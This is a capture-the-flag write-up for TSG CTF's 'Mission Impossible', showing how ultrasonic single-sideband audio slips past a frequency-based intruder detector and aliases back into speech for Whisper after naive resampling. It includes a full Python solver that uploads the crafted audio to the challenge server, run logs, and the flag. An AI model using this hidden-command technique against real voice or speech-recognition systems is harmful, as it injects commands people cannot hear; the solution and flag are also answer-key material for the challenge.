![[Pasted image 20251221024008.png]]

//TSG CTF – Mission Impossible (MISC)

Remote: http://35.194.98.181:57860/

Flag format: TSGCTF{...}

>TL;DR

The service runs Whisper speech-to-text, but it also has a broken “intruder detector” that triggers on any non-zero energy below 10kHz.
The key bug: after zeroing every bin above 10kHz it checks magnitude > 0, so any residue below 10kHz that survives the 0.01 threshold, however small, triggers the "ALERT! Intruder detected!" response.
Solution: craft an audio signal with all energy above 10kHz (so detector sees exactly 0), but which still becomes intelligible to Whisper after the server’s naive linear resampling (res_type="linear") from a higher sample rate to 16kHz.
This is done by placing a speech signal in an ultrasonic band (single-sideband modulation), relying on aliasing during the downsample to fold it back into the speech band.

Final flag:

TSGCTF{Th1S_fl4g_wiLL_s3lf-deSTrucT_in_5_s3c0nds}

>1) Local analysis

1.1 Files

The attachment is a tiny tarball containing a Dockerized Gradio app.

Terminal transcript (local) (from local_analysis.log):

```text
$ ls -la
(total listing omitted)

$ file -b mission_impossible.tar.gz
gzip compressed data, from Unix, original size modulo 2^32 10240

$ tar -xzvf mission_impossible.tar.gz -C extracted
mission_impossible/
mission_impossible/Dockerfile
mission_impossible/src/
mission_impossible/src/server.py
```

1.2 Reading the server

The core logic is in extracted/mission_impossible/src/server.py.

Key parts (verbatim):


```python
def detect_intruder(freq_space, sr):
    cut_high_freqs(freq_space, sr, 10000)
    magnitude = np.abs(freq_space).max()
    return magnitude > 0

...

freq_space = librosa.stft(wave, n_fft=N_FFT)
freq_space[np.abs(freq_space) < 0.01] = 0
wave = librosa.istft(freq_space)

if detect_intruder(freq_space, sr):
    return "ALERT! Intruder detected!"

wave = librosa.resample(wave, orig_sr=sr, target_sr=WHISPER_SR, res_type="linear")
result = whisper.transcribe(model, wave, temperature=0.0)["text"]
if "give me the flag" in result.lower():
    return "OK, here is the flag: " + FLAG
```

1.3 What the bug means

detect_intruder() cuts high frequencies (everything above 10kHz), then computes magnitude = max(abs(freq_space)).
It returns magnitude > 0.

So the detector triggers if there is any non-zero STFT bin below 10kHz.

Because they already did a “noise cancellation” step:


```python
freq_space[np.abs(freq_space) < 0.01] = 0
```

…we can aim to make all STFT bins under 10kHz exactly zero (after their thresholding), so magnitude == 0 and the detector does not fire.
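A minimal sketch of that check, to make the pass/fail condition concrete. It is not the server's code: `simple_stft` is a hypothetical numpy-only stand-in for `librosa.stft` (full frames only, no edge padding), and the body of `cut_high_freqs` is not shown in the excerpt, so zeroing every bin from `int(10000 * N_FFT / sr)` upward is an assumption borrowed from the solver's local check.

```python
import numpy as np

N_FFT = 400          # FFT size used by the solver's local check
CUTOFF_HZ = 10_000   # the detector only inspects bins below this frequency
THRESHOLD = 0.01     # the server's "noise cancellation" threshold


def simple_stft(wave, n_fft=N_FFT, hop=N_FFT // 4):
    """Hann-windowed STFT over full frames only (hypothetical stand-in for librosa.stft)."""
    window = 0.5 - 0.5 * np.cos(2.0 * np.pi * np.arange(n_fft) / n_fft)  # periodic Hann
    starts = range(0, len(wave) - n_fft + 1, hop)
    frames = np.stack([wave[s:s + n_fft] * window for s in starts], axis=1)
    return np.fft.rfft(frames, axis=0)  # shape: (n_fft // 2 + 1, n_frames)


def intruder_magnitude(wave, sr):
    spec = simple_stft(wave)
    spec[np.abs(spec) < THRESHOLD] = 0          # thresholding step from server.py
    cutoff_bin = int(CUTOFF_HZ * N_FFT / sr)    # ASSUMED behaviour of cut_high_freqs
    spec[cutoff_bin:, :] = 0                    # drop everything at or above the cutoff bin
    return float(np.abs(spec).max())


sr = 48_000
t = np.arange(sr) / sr
low_tone = np.sin(2 * np.pi * 1_000 * t)     # energy inside the inspected band
high_tone = np.sin(2 * np.pi * 15_000 * t)   # energy only above 10kHz

print(intruder_magnitude(low_tone, sr) > 0)    # True  -> detector fires
print(intruder_magnitude(high_tone, sr) > 0)   # False -> detector stays silent
```

The 15kHz tone falls exactly on an STFT bin here, so its leakage into lower bins is at floating-point noise level and the threshold wipes it out. Real speech-shaped payloads leak more, which is why the solver adds a steep high-pass filter.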

1.4 Why “ultrasonic + aliasing” is the right idea

At first this sounds impossible: if we remove everything below 10kHz, Whisper can’t hear the phrase, right?

But note the order:

1. They compute the STFT and threshold it.
2. They inverse-STFT back to wave.
3. They call detect_intruder(freq_space, sr) on the frequency-domain copy.
4. If safe, they resample the time-domain wave to 16kHz using res_type="linear".

So:

- We only need to ensure the STFT bins below 10kHz are 0 to bypass the detector.
- The time-domain wave is still used for Whisper. If that wave contains ultrasonic information, and the resampling is naive, it can alias into the audible range.

This is a classic signal-processing pitfall:

Downsampling without a proper anti-alias low-pass filter folds high-frequency content into low frequencies.

That gave the core exploitation idea:

Encode the command phrase into an ultrasonic band (>10kHz). The detector sees 0 (because it removes those bins). Then the server’s naive resampling folds (aliases) that ultrasonic band back into the speech band, and Whisper transcribes it.
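The folding can be checked with a single tone. The sketch below is an illustration rather than the server's resampler: `linear_downsample` is a hypothetical helper that uses `np.interp` as a stand-in for `librosa.resample(..., res_type="linear")`, on the assumption that both interpolate linearly without any low-pass filtering. For a 3:1 ratio the new sample positions land exactly on every third input sample, so a 17kHz tone at 48kHz comes out at 17000 - 16000 = 1000 Hz.

```python
import numpy as np


def linear_downsample(wave, orig_sr, target_sr):
    """Linear interpolation onto the coarser time grid, with no anti-alias filter."""
    out_len = int(len(wave) * target_sr / orig_sr)
    x_new = np.arange(out_len) * (orig_sr / target_sr)  # positions in input samples
    return np.interp(x_new, np.arange(len(wave)), wave)


def dominant_frequency(wave, sr):
    """Frequency (Hz) of the strongest bin in the magnitude spectrum."""
    spectrum = np.abs(np.fft.rfft(wave))
    return float(np.argmax(spectrum) * sr / len(wave))


orig_sr, target_sr = 48_000, 16_000
t = np.arange(orig_sr) / orig_sr              # one second of audio
tone = np.cos(2 * np.pi * 17_000 * t)         # well above the 10kHz detector band

aliased = linear_downsample(tone, orig_sr, target_sr)
print(dominant_frequency(tone, orig_sr))        # 17000.0
print(dominant_frequency(aliased, target_sr))   # 1000.0
```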

>2) Building the exploit locally

2.1 Tooling

I needed:

- espeak-ng to synthesize “give me the flag” reproducibly
- Python libs for signal processing (numpy, scipy, soundfile, librosa)

(Installed in this environment with apt/pip.)

2.2 How the payload is constructed

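Steps:

1. Synthesize a clean baseband speech waveform at WHISPER_SR=16000.
2. Low-pass it (≈4kHz) so that the modulated band stays narrow and, once shifted, sits entirely above the 10kHz cutoff.
3. Upsample to 48kHz.
4. Perform single-sideband (SSB) modulation via the analytic signal (Hilbert transform):

\[
x_{\mathrm{ssb}}(t) = \Re\left\{ \left(x(t) + j\,\hat{x}(t)\right) e^{j 2\pi f_c t} \right\}
\]

   This shifts the speech spectrum up to the band just above the carrier frequency f_c (16kHz by default), i.e. roughly 16 to 20kHz. Since 16kHz is also the server's target sample rate, a component at f_c + f folds back to f after the downsample.

5. Apply a strong high-pass filter (the solver defaults to 10.5kHz; the successful run used 13kHz) so any residual energy below 10kHz is eliminated.
6. Save as a standard PCM16 WAV.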
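The SSB step can be sketched in isolation with numpy only. Here `analytic_signal` is a hypothetical helper that builds x + j·x̂ with an FFT by zeroing the negative frequencies (the same construction that `scipy.signal.hilbert`, used by the solver, is based on), and a 1kHz tone stands in for speech. The point of the sketch is that only the upper sideband at f_c + 1kHz appears, with nothing mirrored at f_c - 1kHz.

```python
import numpy as np


def analytic_signal(x):
    """FFT-based analytic signal: keep DC/Nyquist, double positive bins, zero negative bins."""
    n = len(x)
    spectrum = np.fft.fft(x)
    gain = np.zeros(n)
    gain[0] = 1.0
    if n % 2 == 0:
        gain[n // 2] = 1.0
        gain[1:n // 2] = 2.0
    else:
        gain[1:(n + 1) // 2] = 2.0
    return np.fft.ifft(spectrum * gain)


def ssb_upshift(x, sr, carrier_hz):
    """Shift the whole spectrum of x up by carrier_hz (upper sideband only)."""
    t = np.arange(len(x)) / sr
    return np.real(analytic_signal(x) * np.exp(2j * np.pi * carrier_hz * t))


sr = 48_000
t = np.arange(sr) / sr
baseband = np.cos(2 * np.pi * 1_000 * t)      # stand-in for speech content at 1kHz
shifted = ssb_upshift(baseband, sr, 16_000.0)

spectrum = np.abs(np.fft.rfft(shifted))       # 1 Hz per bin for a one-second signal
print(int(np.argmax(spectrum)))               # 17000: the upper sideband
print(spectrum[15_000] / spectrum[17_000] < 1e-6)   # True: no lower sideband at 15kHz
```

Plain AM (the solver's `--mode am`) would instead produce both 15kHz and 17kHz components, which after folding land on top of each other in the speech band.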

2.3 Local verification (important)

Before even touching the remote, the solver emulates the server’s detection logic:

1. STFT (n_fft=400)
2. Set bins with magnitude < 0.01 to zero
3. Zero the bins above 10kHz and take the maximum magnitude of what remains

If the check returns exactly 0.0, we know the detector will not trigger.

>3) Remote exploitation

3.1 API discovery

The UI is Gradio, and it exposes endpoints under the prefix shown in /config:

api_prefix = /gradio_api

The reliable way (works even when gradio_client API-metadata is flaky) is to use:

- POST /gradio_api/upload to upload the WAV
- POST /gradio_api/run/predict with a FileData object referencing the uploaded server path

The solver does exactly this using httpx.
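As a rough sketch of how the two URLs and the request body fit together, the helpers below derive the endpoints from the `api_prefix` value reported by /config and build the JSON payload the solver sends. `gradio_endpoints` and `predict_payload` are hypothetical names introduced for illustration, the config dict is hard-coded rather than fetched, and the uploaded path is a made-up placeholder (the real one comes back from the upload response).

```python
def gradio_endpoints(base_url: str, config: dict) -> dict:
    """Build the upload/predict URLs from the api_prefix found in the /config JSON."""
    prefix = config.get("api_prefix", "").strip("/")
    root = base_url.rstrip("/")
    if prefix:
        root = f"{root}/{prefix}"
    return {"upload": f"{root}/upload", "predict": f"{root}/run/predict"}


def predict_payload(uploaded_path: str) -> dict:
    """Request body for run/predict: one FileData entry pointing at the uploaded file."""
    return {"data": [{"path": uploaded_path, "meta": {"_type": "gradio.FileData"}}]}


config = {"api_prefix": "/gradio_api"}   # value observed in /config for this challenge
endpoints = gradio_endpoints("http://35.194.98.181:57860/", config)
payload = predict_payload("/tmp/example/attack2.wav")  # placeholder path, not a real server path

print(endpoints["upload"])
print(endpoints["predict"])
```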

3.2 Successful remote run

Terminal transcript (remote) (from remote_run.log):

```text
$ python3 solve_mission_impossible.py \
    --out attack2.wav \
    --mode ssb \
    --repeat 8 \
    --hp 13000 \
    --remote http://35.194.98.181:57860/

[+] Wrote: /home/noigel/CTF/tsg/MISC/Mission_Impossible/attack2.wav
[+] Intruder magnitude after cut (should be 0.0): 0.0
[+] Alias self-corr sanity (higher is better): 0.9999
[+] Attack RMS: 0.104154
[+] Aliased (LP) RMS: 0.073874
[+] Remote response:
OK, here is the flag: TSGCTF{Th1S_fl4g_wiLL_s3lf-deSTrucT_in_5_s3c0nds}
```

>4) Full solver code

File: solve_mission_impossible.py

```python
#!/usr/bin/env python3
import argparse
import math
import os
import subprocess
import tempfile
from dataclasses import dataclass
from pathlib import Path

import numpy as np
import soundfile as sf
from scipy.signal import butter, filtfilt, hilbert
import librosa


def remote_run_predict(remote: str, wav_path: Path, timeout_s: float = 120.0) -> str:
    """Run the remote Gradio app via HTTP endpoints.

    Uses:
      - POST /gradio_api/upload
      - POST /gradio_api/run/predict
    """
    import httpx

    base = remote.rstrip("/")
    upload_url = f"{base}/gradio_api/upload"
    run_url = f"{base}/gradio_api/run/predict"

    with httpx.Client(timeout=timeout_s) as client:
        with wav_path.open("rb") as f:
            files = {"files": (wav_path.name, f, "audio/wav")}
            r = client.post(upload_url, files=files)
        r.raise_for_status()
        uploaded_path = r.json()[0]

        payload = {
            "data": [
                {
                    "path": uploaded_path,
                    "meta": {"_type": "gradio.FileData"},
                }
            ]
        }
        rr = client.post(run_url, json=payload)
        rr.raise_for_status()
        j = rr.json()
        return j.get("data", [""])[0]


N_FFT = 400
MAX_DURATION = 5
WHISPER_SR = 16000


@dataclass
class LocalCheckResult:
    intruder_magnitude_after_cut: float
    corr_base_vs_aliased: float
    base_rms: float
    attack_rms: float


def linear_resample(wave: np.ndarray, orig_sr: int, target_sr: int) -> np.ndarray:
    """Resample via linear interpolation (intentionally naive, to match the service)."""
    if orig_sr == target_sr:
        return wave.astype(np.float32, copy=False)
    if wave.ndim != 1:
        raise ValueError("linear_resample expects mono audio")
    if orig_sr <= 0 or target_sr <= 0:
        raise ValueError("Invalid sample rates")

    ratio = target_sr / float(orig_sr)
    out_len = max(1, int(round(len(wave) * ratio)))
    x_old = np.arange(len(wave), dtype=np.float32)
    x_new = np.linspace(0.0, float(len(wave) - 1), out_len, dtype=np.float32)
    return np.interp(x_new, x_old, wave.astype(np.float32, copy=False)).astype(np.float32, copy=False)


def _butter_filter(wave: np.ndarray, sr: int, kind: str, cutoff_hz: float, order: int = 6) -> np.ndarray:
    nyq = 0.5 * sr
    if cutoff_hz <= 0 or cutoff_hz >= nyq:
        raise ValueError(f"cutoff_hz must be within (0, {nyq})")
    w = cutoff_hz / nyq
    b, a = butter(order, w, btype=kind)
    return filtfilt(b, a, wave).astype(np.float32, copy=False)


def synthesize_phrase_espeak(phrase: str, out_wav: Path, sr: int = WHISPER_SR) -> None:
    out_wav.parent.mkdir(parents=True, exist_ok=True)
    cmd = [
        "espeak-ng",
        "-v",
        "en-us",
        "-s",
        "150",
        "-w",
        str(out_wav),
        phrase,
    ]
    subprocess.check_call(cmd)
    # espeak-ng chooses its own SR; normalize to requested.
    wave, in_sr = sf.read(out_wav, dtype="float32")
    if wave.ndim == 2:
        wave = wave.mean(axis=1)
    if in_sr != sr:
        wave = librosa.resample(wave, orig_sr=in_sr, target_sr=sr, res_type="kaiser_best")
        sf.write(out_wav, wave, sr)


def make_ultrasonic_attack(
    base_wave: np.ndarray,
    base_sr: int,
    attack_sr: int = 48000,
    base_lowpass_hz: float = 4000.0,
    carrier_hz: float = 16000.0,
    safety_highpass_hz: float = 10500.0,
    mode: str = "ssb",
) -> np.ndarray:
    if base_wave.ndim != 1:
        raise ValueError("base_wave must be mono")
    if base_sr <= 0 or attack_sr <= 0:
        raise ValueError("Invalid sample rates")

    # Trim to the service’s max duration.
    base_wave = base_wave[: int(MAX_DURATION * base_sr)].astype(np.float32, copy=False)

    # Band-limit so that, once shifted, everything stays above the 10k cutoff.
    base_wave = _butter_filter(base_wave, base_sr, "lowpass", base_lowpass_hz)

    # Upsample to a higher SR so we can place content in >10k.
    if base_sr != attack_sr:
        up = librosa.resample(base_wave, orig_sr=base_sr, target_sr=attack_sr, res_type="kaiser_best")
    else:
        up = base_wave

    t = np.arange(len(up), dtype=np.float32) / float(attack_sr)
    if mode == "ssb":
        # Single-sideband modulation via analytic signal to avoid creating a low-frequency image.
        analytic = hilbert(up).astype(np.complex64, copy=False)
        shifted = np.real(analytic * np.exp(1j * (2.0 * math.pi * carrier_hz) * t)).astype(np.float32)
    elif mode == "am":
        # AM modulation: creates symmetric sidebands around the carrier.
        carrier = np.cos((2.0 * math.pi * carrier_hz) * t).astype(np.float32)
        # Add a small bias so the envelope survives thresholding better.
        shifted = ((0.75 * up + 0.25) * carrier).astype(np.float32)
    else:
        raise ValueError("mode must be 'ssb' or 'am'")

    # Extra safety: remove any residual energy below cutoff.
    shifted = _butter_filter(shifted, attack_sr, "highpass", safety_highpass_hz)

    # Normalize.
    peak = float(np.max(np.abs(shifted)) + 1e-9)
    shifted = (0.95 * shifted / peak).astype(np.float32)
    return shifted


def server_like_local_check(attack_wave: np.ndarray, sr: int) -> LocalCheckResult:
    # Emulate key parts of server.py without Whisper.
    wave = attack_wave[: int(MAX_DURATION * sr)].astype(np.float32, copy=False)

    # Server STFT + threshold.
    freq_space = librosa.stft(wave, n_fft=N_FFT)
    freq_space[np.abs(freq_space) < 0.01] = 0
    denoised = librosa.istft(freq_space)

    # detect_intruder: cut high freqs then magnitude check.
    cutoff_bin = int(10000 * N_FFT / sr)
    freq_cut = freq_space.copy()
    if cutoff_bin < freq_cut.shape[0]:
        freq_cut[cutoff_bin:, :] = 0
    magnitude = float(np.abs(freq_cut).max())

    aliased = linear_resample(denoised.astype(np.float32, copy=False), orig_sr=sr, target_sr=WHISPER_SR)
    # Compare against an expected “baseband” reconstruction: the aliasing should recover speech-ish content.
    # We use self-correlation proxy by comparing aliased to its own lowpassed version (gives a sanity signal).
    aliased_lp = _butter_filter(aliased.astype(np.float32), WHISPER_SR, "lowpass", 4000.0)

    n = min(len(aliased), len(aliased_lp))
    a = aliased[:n]
    b = aliased_lp[:n]
    denom = float(np.linalg.norm(a) * np.linalg.norm(b) + 1e-9)
    corr = float(np.dot(a, b) / denom)

    return LocalCheckResult(
        intruder_magnitude_after_cut=magnitude,
        corr_base_vs_aliased=corr,
        base_rms=float(np.sqrt(np.mean(aliased_lp**2) + 1e-12)),
        attack_rms=float(np.sqrt(np.mean(wave**2) + 1e-12)),
    )


def write_int16_wav(path: Path, wave: np.ndarray, sr: int) -> None:
    path.parent.mkdir(parents=True, exist_ok=True)
    wave = np.clip(wave, -1.0, 1.0)
    sf.write(path, (wave * 32767.0).astype(np.int16), sr, subtype="PCM_16")


def main() -> int:
    ap = argparse.ArgumentParser(description="TSGCTF Mission Impossible solver (local-first).")
    ap.add_argument("--out", default="attack.wav", help="Output attack WAV file")
    ap.add_argument("--phrase", default="give me the flag", help="Command phrase")
    ap.add_argument("--attack-sr", type=int, default=48000, help="Attack WAV sample rate")
    ap.add_argument("--carrier", type=float, default=16000.0, help="Carrier frequency (Hz)")
    ap.add_argument("--hp", type=float, default=10500.0, help="High-pass cutoff (Hz) to keep energy >10k")
    ap.add_argument("--mode", choices=["ssb", "am"], default="ssb", help="Ultrasonic modulation mode")
    ap.add_argument("--repeat", type=int, default=3, help="Repeat phrase N times for better recognition")
    ap.add_argument("--remote", default=None, help="Remote Gradio URL (optional)")
    ap.add_argument("--remote-timeout", type=float, default=180.0, help="Remote request timeout in seconds")
    args = ap.parse_args()

    out_path = Path(args.out).resolve()

    with tempfile.TemporaryDirectory() as td:
        base_wav = Path(td) / "base.wav"
        phrase = (" ".join([args.phrase] * max(1, int(args.repeat)))).strip()
        synthesize_phrase_espeak(phrase, base_wav, sr=WHISPER_SR)
        base_wave, base_sr = sf.read(base_wav, dtype="float32")
        if base_wave.ndim == 2:
            base_wave = base_wave.mean(axis=1)
        base_wave = base_wave.astype(np.float32, copy=False)

        attack = make_ultrasonic_attack(
            base_wave,
            base_sr,
            attack_sr=args.attack_sr,
            carrier_hz=args.carrier,
            safety_highpass_hz=args.hp,
            mode=args.mode,
        )
        write_int16_wav(out_path, attack, args.attack_sr)

    check = server_like_local_check(attack, args.attack_sr)
    print("[+] Wrote:", out_path)
    print("[+] Intruder magnitude after cut (should be 0.0):", check.intruder_magnitude_after_cut)
    print("[+] Alias self-corr sanity (higher is better):", f"{check.corr_base_vs_aliased:.4f}")
    print("[+] Attack RMS:", f"{check.attack_rms:.6f}")
    print("[+] Aliased (LP) RMS:", f"{check.base_rms:.6f}")

    if args.remote:
        msg = remote_run_predict(args.remote, out_path, timeout_s=float(args.remote_timeout))
        print("[+] Remote response:")
        print(msg)

    return 0


if __name__ == "__main__":
    raise SystemExit(main())
```

>5) References / concepts used

These are the ideas this challenge relies on (and what I used to reason about it):

Nyquist–Shannon sampling theorem and aliasing (downsampling without proper anti-alias filtering):

- https://en.wikipedia.org/wiki/Nyquist%E2%80%93Shannon_sampling_theorem

- https://en.wikipedia.org/wiki/Aliasing

Hilbert transform / analytic signal (to build single-sideband modulation):

- https://en.wikipedia.org/wiki/Hilbert_transform

- https://en.wikipedia.org/wiki/Single-sideband_modulation

Gradio HTTP API endpoints (conceptually; the exact endpoints were confirmed from /config and /gradio_api/openapi.json):

- https://www.gradio.app/

>6) Notes / troubleshooting

- If you get ALERT! Intruder detected!, your payload still has non-zero energy below 10kHz after their STFT thresholding. Increase --hp (e.g. 13000) and keep the signal normalized.
- If you get Unknown command., Whisper didn’t recognize the phrase. Increase --repeat (I used 8) or try a different carrier. Keep in mind that any offset from 16kHz shifts the recovered speech spectrum by the same number of hertz, so stay close to it.

>7) Reproduction checklist

From this folder:

```bash
# Local-only generation + detector check
python3 solve_mission_impossible.py --out attack2.wav --mode ssb --repeat 8 --hp 13000

# Remote solve (prints flag)
python3 solve_mission_impossible.py --out attack2.wav --mode ssb --repeat 8 --hp 13000 --remote http://35.194.98.181:57860/
```